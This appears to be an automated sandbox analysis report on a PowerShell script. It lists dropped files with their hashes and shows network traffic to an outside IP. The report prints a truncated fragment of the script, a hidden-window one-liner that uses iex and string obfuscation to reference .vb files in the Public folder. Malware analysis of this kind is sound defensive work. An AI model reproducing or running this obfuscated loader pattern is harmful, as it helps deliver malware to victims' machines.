                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllul79Yll//Z:NllUGl
                                                                                  MD5:851849E23E67E904A88407CDB0964345
                                                                                  SHA1:4B33734D0E176A208FE58C3EB552CA42A9F6ECD9
                                                                                  SHA-256:CCDB092D6A7666749275AC8E7AFBCB9CC36BA225054ABFD6F8C94D152FB65BCB
                                                                                  SHA-512:030ACC5F1C6C53410065D6DD7BD8FB63BF9A5B4CCD31AC05A35A4D061F595954FECCF9B93EC9FE195269018687EA10F963B7C5B82CEA305304B7781E1B23CAAA
                                                                                  Malicious:false
                                                                                  Preview:@...e.................................j.}............@..........
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):246
                                                                                  Entropy (8bit):3.5197430193686525
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAwlJH:Qw946cPbiOxDlbYnuRKS
                                                                                  MD5:3C7C273DD17E759D75650CEED75E5DB8
                                                                                  SHA1:50844EA6EE792CC963774E0417923DD3BBB4FD8E
                                                                                  SHA-256:EDAF51160C761EA41AB7758C0190E32F7475FD2CABABF7E13BFBD6D1A295B519
                                                                                  SHA-512:0DD8062612416E379257AF18A327E0F56356885F39E7FE76DF6D4C693D3740F3D068D7BEC3F094AC977F699283182AC3E8F097A2B249777F93D2B7D9A7779E10
                                                                                  Malicious:false
                                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.8.:.1.4.:.3.1. .=.=.=.....
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with very long lines (393)
                                                                                  Category:dropped
                                                                                  Size (bytes):16525
                                                                                  Entropy (8bit):5.386483451061953
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                                  MD5:F49CA270724D610D1589E217EA78D6D1
                                                                                  SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                                  SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                                  SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                                  Malicious:false
                                                                                  Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):15114
                                                                                  Entropy (8bit):5.347393506755955
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:0QkB0kVYbJFUu99pUKC02vMxfEXwJwUJB+F5vTfg/gq/mcU1du/Sz4zKrsyRcV1O:Nzq
                                                                                  MD5:AD3E68BC1029549526C09BCFC02E10A2
                                                                                  SHA1:66733262830C9CF149202C8D3FA55855F343E671
                                                                                  SHA-256:354BC7E6EC781C463AF04AC941482F41222A5C01E8C03FCAF3BBB6CDFEA7C628
                                                                                  SHA-512:10F05299D2ED8004379547E953E982E96EB5DC00D41DB1B17D6648546D1D2EBAA5F242896182EE5268A66352E663CDFF99C667559302E1D41DBCBB27B4FEA6AE
                                                                                  Malicious:false
                                                                                  Preview:SessionID=b7820f70-9b46-488a-801e-1b4f6158581a.1734614065320 Timestamp=2024-12-19T08:14:25:320-0500 ThreadID=1660 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b7820f70-9b46-488a-801e-1b4f6158581a.1734614065320 Timestamp=2024-12-19T08:14:25:331-0500 ThreadID=1660 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b7820f70-9b46-488a-801e-1b4f6158581a.1734614065320 Timestamp=2024-12-19T08:14:25:331-0500 ThreadID=1660 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b7820f70-9b46-488a-801e-1b4f6158581a.1734614065320 Timestamp=2024-12-19T08:14:25:331-0500 ThreadID=1660 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b7820f70-9b46-488a-801e-1b4f6158581a.1734614065320 Timestamp=2024-12-19T08:14:25:331-0500 ThreadID=1660 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):35721
                                                                                  Entropy (8bit):5.413595610646178
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRi:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRE
                                                                                  MD5:0A4FB9F23010B5FBE3C169D55BB03984
                                                                                  SHA1:360B5726E66A81C088F06C4D7573B703C36F41FD
                                                                                  SHA-256:1EDF34FB344D0AF2ED1FB482A1B878382C99582FBD029B2AC9E0961E023FD6E9
                                                                                  SHA-512:86C1B3CD5464E7B1FE368F4AA9D7D4F77B5A76EF8E5870257724E9CB314728258F70AE5F4BA4835B9C806870ECF785F13586188EBC9DDC2B6A819A75BEC2F01F
                                                                                  Malicious:false
                                                                                  Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                  Category:dropped
                                                                                  Size (bytes):1419751
                                                                                  Entropy (8bit):7.976496077007677
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:/xA7owWLkwYIGNPglGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGYGZN3mlind9i4ufFXpAXkru
                                                                                  MD5:70AD54396BBB59F17F819EA2E17952E3
                                                                                  SHA1:12F953092D5E5FA47A59B691FEBC5DD99BE05E51
                                                                                  SHA-256:268E6A1F174E08A9A7C8DFC493EA378369D69B5C2BBDD38E0E422009B574E488
                                                                                  SHA-512:5DE36F3081054B7B98C99B193978CCE32188CAE933CA4B73A6ECF29D04A3FF69FD3B329884F3609C6274B4A5934900901989B55A176EC2A64004A54713B7A623
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                  Category:dropped
                                                                                  Size (bytes):386528
                                                                                  Entropy (8bit):7.9736851559892425
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                  Category:dropped
                                                                                  Size (bytes):758601
                                                                                  Entropy (8bit):7.98639316555857
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                  MD5:3A49135134665364308390AC398006F1
                                                                                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                  Category:dropped
                                                                                  Size (bytes):1407294
                                                                                  Entropy (8bit):7.97605879016224
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLrGZkYYIGNPpe:JVB3mlind9i4ufFXpAXkrfUs0jWLrGZR
                                                                                  MD5:B3D1B54366754A70AE6AA907F2D4B6F5
                                                                                  SHA1:DACAEE18CCFB0BC5757E6E6B8A5CE301E69EDFE4
                                                                                  SHA-256:355E2A370061490E2B526E53E817359BB11294BE637448AB7E29D00DF2D8D6BE
                                                                                  SHA-512:FD9DD45BA7B4D87D5162D01621A4656B3682719117F50C422643C9151063A5ED12031D7624967DD84D4545198CBBA1AC4A04C6E8B0BCD205085FB0FF0B156E49
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6225
                                                                                  Entropy (8bit):3.7457600993665294
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:zD2P7kmw2CAU20iFukvhkvklCywUeF+Sl6NSogZocJiJa+F+SllNSogZocJiJO1:2P75w2CprtkvhkvCCt3F+S9HgF+SUHP
                                                                                  MD5:1F6101B436B0F496B6E88930B8C9FDCC
                                                                                  SHA1:3FE3ABB11D23CFCE73DABE48A548AFD7554F01B4
                                                                                  SHA-256:784A32C5A90FEEC137AEB81D49A5F7BC089D64D0E83787B182EC8DA1642C8E70
                                                                                  SHA-512:C320DF80F8C44F40F76A3E1E106A7FBC33FB037B6097C61417912340291418FFB5AF65CFC80D815B26A17ADB05A20A03765CE755273AF3B21802F9D4522D4B69
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. .....*_...b..U.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....V.P.R..3..U.R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.]..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW.=.Y.]..........................Jc..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.]..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.]...........................j(.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.]....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.]....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.]....9...........
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6225
                                                                                  Entropy (8bit):3.7457600993665294
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:zD2P7kmw2CAU20iFukvhkvklCywUeF+Sl6NSogZocJiJa+F+SllNSogZocJiJO1:2P75w2CprtkvhkvCCt3F+S9HgF+SUHP
                                                                                  MD5:1F6101B436B0F496B6E88930B8C9FDCC
                                                                                  SHA1:3FE3ABB11D23CFCE73DABE48A548AFD7554F01B4
                                                                                  SHA-256:784A32C5A90FEEC137AEB81D49A5F7BC089D64D0E83787B182EC8DA1642C8E70
                                                                                  SHA-512:C320DF80F8C44F40F76A3E1E106A7FBC33FB037B6097C61417912340291418FFB5AF65CFC80D815B26A17ADB05A20A03765CE755273AF3B21802F9D4522D4B69
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. .....*_...b..U.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....V.P.R..3..U.R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.]..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW.=.Y.]..........................Jc..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.]..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.]...........................j(.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.]....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.]....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.]....9...........
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                  Category:dropped
                                                                                  Size (bytes):871324
                                                                                  Entropy (8bit):7.827941732382635
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                  MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                  SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                  SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                  SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                  Malicious:false
                                                                                  Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):55
                                                                                  Entropy (8bit):4.306461250274409
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                  Malicious:false
                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                  File type:ASCII text, with very long lines (841), with no line terminators
                                                                                  Entropy (8bit):5.330726687403697
                                                                                  TrID:
                                                                                    File name:2rTi9MgX25.ps1
                                                                                    File size:841 bytes
                                                                                    MD5:28e4d353dd649e9252cb62d9be6fb391
                                                                                    SHA1:16ecf4dcec8d1bdf466de38daf89b4d39af55834
                                                                                    SHA256:89e06f26911f39129d6fb9ed523e53c44804c96031924c4f2ee754a49dd278cf
                                                                                    SHA512:746ceb99d14517d57866f581856cc901626c52b31c24fc5b309f08897cd919b985c88a81e5e1da046df5998722bd04ed53a8b8ad1785b91fbffb16912730c39d
                                                                                    SSDEEP:24:X98IVyjVjWIPqcz/LYBQWAa6KzEp9zo2m:xSVKIPqZcKzgdor
                                                                                    TLSH:BE0152CA6E4651E76F00E99128C095393635C806A8D600F1F2B8421335ACE3C0DC2B6A
                                                                                    File Content Preview:powershell -win hidden $kilo4z=iex($('[Environment]::GetEo5ds'''.Replace('o5d','nvironmentVariable(''public'') + ''\\f2iuzg.vb')));$flol=iex($('[Environment]::GetEo5ds'''.Replace('o5d','nvironmentVariable(''public'') + ''\\iys.vb')));function getit([strin
                                                                                    Icon Hash:3270d6baae77db44
                                                                                     Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                                                     Dec 19, 2024 12:44:28.650613070 CET  49712        443        192.168.2.7      107.161.23.150
                                                                                     Dec 19, 2024 12:44:28.650666952 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:28.650799990 CET  49712        443        192.168.2.7      107.161.23.150
                                                                                     Dec 19, 2024 12:44:28.660104036 CET  49712        443        192.168.2.7      107.161.23.150
                                                                                     Dec 19, 2024 12:44:28.660130024 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:29.911691904 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:29.911792994 CET  49712        443        192.168.2.7      107.161.23.150
                                                                                     Dec 19, 2024 12:44:29.914725065 CET  49712        443        192.168.2.7      107.161.23.150
                                                                                     Dec 19, 2024 12:44:29.914743900 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:29.915123940 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:29.921435118 CET  49712        443        192.168.2.7      107.161.23.150
                                                                                     Dec 19, 2024 12:44:29.967331886 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:30.355665922 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:30.402590990 CET  49712        443        192.168.2.7      107.161.23.150
                                                                                     Dec 19, 2024 12:44:30.475691080 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:30.475717068 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:30.475739956 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:30.475747108 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:30.475780010 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:30.475790024 CET  49712        443        192.168.2.7      107.161.23.150
                                                                                     Dec 19, 2024 12:44:30.475815058 CET  443          49712      107.161.23.150   192.168.2.7
                                                                                     Dec 19, 2024 12:44:30.475832939 CET  49712        443        192.168.2.7      107.161.23.150
                                                                                     Dec 19, 2024 12:44:30.475862026 CET  49712        443        192.168.2.7      107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.585323095 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.585365057 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.585453033 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.585472107 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.585499048 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.585513115 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.633996964 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.634031057 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.634085894 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.634098053 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.634134054 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.634145021 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.761383057 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.761408091 CET44349712107.161.23.150192.168.2.7
